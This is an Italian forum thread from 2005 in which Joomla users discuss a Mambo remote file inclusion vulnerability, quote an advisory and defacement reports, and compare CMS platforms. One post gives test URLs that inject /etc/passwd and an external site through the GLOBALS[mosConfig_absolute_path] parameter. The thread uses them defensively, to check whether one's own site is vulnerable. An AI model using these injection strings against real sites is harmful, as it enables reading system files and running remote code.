Importantissimo sicurezza ed exploit !

[matthz]

Buona giornata a tutti.

Stamattina un amico che si interessa di sicurezza mi ha inviato in una mail questo testo consigliandomi di patchare o chiudere il sito.

Chiedevo così a voi se potete dirmi di cosa si tratta ed eventualmente se è qualcosa di cui esiste una patch.

Spero in una risposta anche perchè dovrebbe essere un problema serio che potrebbe toccare tutti.

La versione di Joomla! che ho installato è quella del 31 ottobre (1.0.4)

Grazie!


> Mambo 0day Exploit out in the wild
>
> http://www.fnse.org/news.php
>
> http://share.skype.com/cache/main.htm
> http://mamboserver.com/modules/main.htm
>
> mambo server hacked by a philippine/filipino hacker - the great rebarz99
>
>
> Hacked By Rebarz99
> Mabuhay ang Masang Pilipino!
>
>
> There are rumors that an 0day exploit is circulating among local hackers.
The exploit is based on the advisory at
http://seclists.org/lists/fulldisclosure/2005/Nov/0528.html
>
> Several sites have reportedly been breached as result;
>
> http://www.zone-h.org/en/defacements/mirror/id=3055967/
> http://www.zone-h.org/en/defacements/mirror/id=3056290/
> http://www.zone-h.org/en/defacements/mirror/id=3057741/
>
> Multiple local sites including linux.lorma.edu and various .edu.ph and
.gov.ph sites have also been reportedly hacked into and backdoors put in
place.

[INVY]

Io ho letto questo:

Esecuzione di codice arbitrario in Mambo
http://zone-h.it/advisories/read/id=978

11/17/2005
 
peter MC tachatte ha scoperto una vulnerabilità in Mambo che può essere sfruttata da un utente remoto per manipolare alcune informazioni e compromettere un sistema vulnerabile.
La falla è dovuta ad un errore nel 'register_globals' emulation layer presente in ' globals.php', dove alcuni array usati dal sistema possono essere sovrascritti. La vulnerabilità può essere exploitata attraverso il parametro 'mosConfig_absolute_path' per includere file arbitrari da un percorso locale o esterno al sito affetto.

L'exploitazione della falla richiede che register_globals' sia disabilitato.

La vulnerabilità è stata riscontrata nella versione 4.5.2.3. Altre versioni potrebbero essere affette dal problema.


Soluzione:
Editare il codice sorgente in modo che gli array predefiniti usati dal sistema non possano essere sovrascritti dai parametri forniti dall'utente.


Riferimenti:
http://secunia.com/advisories/17622/
http://secunia.com/advisories/17441/
 
http://www.zone-h.it/advisories/read/id=978

[matthz]

Grazie mille per la risposta INVY !

Secondo te anche Joomla! (nell'ultima versione intendo) può essere vulnerabile?

[INVY]

Purtroppo di PHP non sono esperto (me ne intendo di più di ASP) e non saprei dire.
Io sono passato a Mambo da un mese (ma solo come test) arrivando da PhpNuke e solo da 2 giorni ho convertito a Joomla.
Penso di adottare Joomla come portale ufficiale, ma per l'appunto devo un po' valutare la sicurezza. Anche perchè lo segnalerei come proposta di portale Open Source ai miei Clienti.
Stavo pensando a una cosa: si rende più sicuro se dopo averlo installato si nega il diritto di scrittura su tutte le directory del sito? più che altro funzionerà? (ovviamente senza la possibilità di caricare via browser file, ecc..)

[INVY]

Ho visto che anche su forum di www.joomla.org si discute di questo problema:

http://forum.joomla.org/index.php/topic,19204.0.html

[matthz]

Quindi pare che utilizzando Joomla! 1.0.3 e testando l'exploit dia questo errore: "Fatal error. Global variable hack attempted"

Speriamo bene.

Se c'è qualche altra novità posterò in questo thread, ti pregherei di fare lo stesso.

Per quanto riguarda il discorso di dare Joomla! come soluzione ai tuoi utenti, venendo anch'io da PHP-Nuke ti posso dire che è tutto un altro mondo, molto più flessibile e potente, nonchè semplice da utilizzare. Volendo un tuo utente potrebbe amministrare joomla, modificare i files di linguaggio, ed aggiungengere o rimuovere moduli e components senza dover più utilizzare l'ftp, mentre con phpnuke sai benissimo che questo non è possibile.

[Bettinz]

esatto, leggendo i post joomla si salva...

un altro punto a favore di joomla 

[INVY]

Se c'è qualche altra novità posterò in questo thread, ti pregherei di fare lo stesso.

Non mancherò di postare, se ho altre notizie.

Per quanto riguarda il discorso di dare Joomla! come soluzione ai tuoi utenti, venendo anch'io da PHP-Nuke ti posso dire che è tutto un altro mondo, molto più flessibile e potente, nonchè semplice da utilizzare. Volendo un tuo utente potrebbe amministrare joomla, modificare i files di linguaggio, ed aggiungengere o rimuovere moduli e components senza dover più utilizzare l'ftp, mentre con phpnuke sai benissimo che questo non è possibile.

Infatti è molto potente, nel senso che ha molte possibilità che pare si integrino molto bene tra loro.
Non ritengo sia facilissimo da usare, forse proprio perchè ha tutte queste possibilità e varianti, però una volta individuata la "sua" logica si possono effettuare personalizzazioni notevoli. Ottimo poi il fatto che si può installare un modulo con un semplice "sfoglia, invia e installa" da eseguirsi con un solo CLICK!
Riguardo la sicurezza: io conosco abbastanza bene tutti i principali portali Opensource (fornisco servizi Hosting particolarmente mirati a questi portali), e quindi so che la sicurezza al 100% non esiste. L'essenziale è tenerli aggiornati e.. fare i backup!
Per il resto... buon lavoro al team di Joomla!

[Rosario]

Non sarei molto sicuro come Bettinz per quanto riguarda joomla: nel link suggerito (http://forum.joomla.org/index.php/topic,19204.0.html) sembrerebbe che pure joomla sia affetto. Da quello che  ho capito, per essere vulnerabili bisogna avere PHP >= 4.41 or 5.0.4. Per verificare la vulnerabilita', provate a inserire nel vostro browser:

Codice: [Seleziona]

http://www.miosito.it/index.php?GLOBALS[mosConfig_absolute_path]=/etc/passwdoppure:

Codice: [Seleziona]

http://www.miosito.it/index.php?GLOBALS[mosConfig_absolute_path]=http://www.unaltrosito.it
e saprete subito se siete o no vulnerabili.  Se il messaggio è "fatal error ecc...", allora potete dormire sonni tranquilli, altrimenti, via col backup e con l'upgrade.

E' sufficiente aggiornare php e tutto dovrebbe aggiustarsi.

Mi piacerebbe sapere se qualcuno che ha Joomla (qualsiasi versione) e php < 4.41 o 5.04, effettivamente riscontra questa vulnerabilità.

[Bettinz]

a me dice Fatal error. Global variable hack attempted.
uso php 4.4.1 e joomla 1.0.3 (******)

[alexred]

Da quello che  ho capito, per essere vulnerabili bisogna avere PHP >= 4.41 or 5.0.4.

occhio al simbolo del maggiore o minore.... per essere vulnerabili devi avere queste condizioni:
- Mambo <= 4.5.2.3
- register_globals=Off
- PHP <= 4.4.1 or 5.0.4
- Sef = on

su joomla! 1.04 sono state prese le adeguate contromisure, vediamo se funziona, però capite che le condizioni sono da sfigato......   

[INVY]

Io leggo dal sito joomla.org questo:

Please note, that the exploit is not an exploit when the machine is running PHP >= 4.41 or 5.0.4.

When you have
- Mambo < 4.5.2.3
- register_globals=Off
- PHP < 4.4.1 or 5.0.4

your site is vulnerable.

e a me la prova
www.miodominio.xx/index.php?GLOBALS[mosConfig_absolute_path]=/etc/passwd

da

Fatal error. Global variable hack attempted.

[matthz]

Scusate la domanda ingenua, se io provassi e non mi desse fatal error che succede? Scasso tutto? Fatemi sapere perchè non ho idea di testare il link proposto e rischiare di rovinare il mio lavoro. 

Per rispondere a INVY: è un vero perccato che Joomla! non abbia un manuale di istruzioni, mi sono accorto solo usandolo le immensa potenzialità di questo CMS. Secondo me ci puoi fare davvero di tutto. Dicono che sia superato solo da Typo3, ed a sto punto mi piacerebbe sapere se quel CMS faccia anche i toast! 

[Bettinz]

i toast no, ma fa a malapena il cms 
sarà perchè ero cresciuto con l'html, ma io in typo3 ci capivo poco, tutto stile ad albero e devo dire, solo per utenti advanced..
pensa che sul loro sito, dicono che ci vuole un mese per imparare 
per me joomla dalla 1.1 scalderà i toast con il laser e li farà uscire dal masterizzatore 

[Bettinz]

Typo3 è un signor CMS ...... tanto di cappello

allora vuol dire ke ne so poco 

[carloernesto]

ciao a tutti,
typo3 è super, un cms totalmente ad oggetti in php, solo che ci vogliono molte risorse per farlo funzionare. lo  script richiede da 24 a 32 mb (joomla! .
puoi avere più siti paralleli e un sistema avanzato di gestione, lavora come un file-manager, quindi semplice da comprendere per chi usa il computer.
possiede una marea di estensioni.
la gestione dei permessi e dei gruppi è molto avanzata. possiede front-end e back-end. inoltre, il sito è fornito di un manuale completo sia testuale che video!
quello che fa impressione e che una sola persona la programmato tutto quanto.
ho tradotto un manuale per fare i template di typo3 ma è un modo un pò complesso di lavorare, possiede un suo linguaggio script interno per fare un template
comunque l'ho messo in secondo piano in favore di joomla! molto più semplice e veloce da implementare.
ciao ciao